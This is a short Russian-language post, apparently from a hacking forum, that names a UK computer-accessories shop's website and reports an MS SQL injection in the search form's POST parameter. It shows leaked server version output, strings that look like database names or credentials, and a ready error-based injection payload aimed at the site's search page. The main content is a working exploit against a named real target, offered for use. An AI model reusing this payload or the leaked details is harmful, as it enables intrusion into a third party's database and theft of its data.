Щоп с компьютерными аксессуарами

Сайт: groupgear.co.uk

MS SQL Injection через POST

уязвимый параметр inputsearch

microsoft sql server 2012 (sp1) - 11.0.3156.0 (x64) may 4 2015 18:48:09 copyright (c) microsoft corporation web edition (64-bit) on windows nt 6.2 <x64> (build 9200: ) (hypervisor)|

computergear2012|computerSQL2014

эксплоит:

Код:

URL:http://www.groupgear.co.uk/searchResults.asp
POST:'AND 1=cast(@@VERSION as varchar(8000)) or '1'='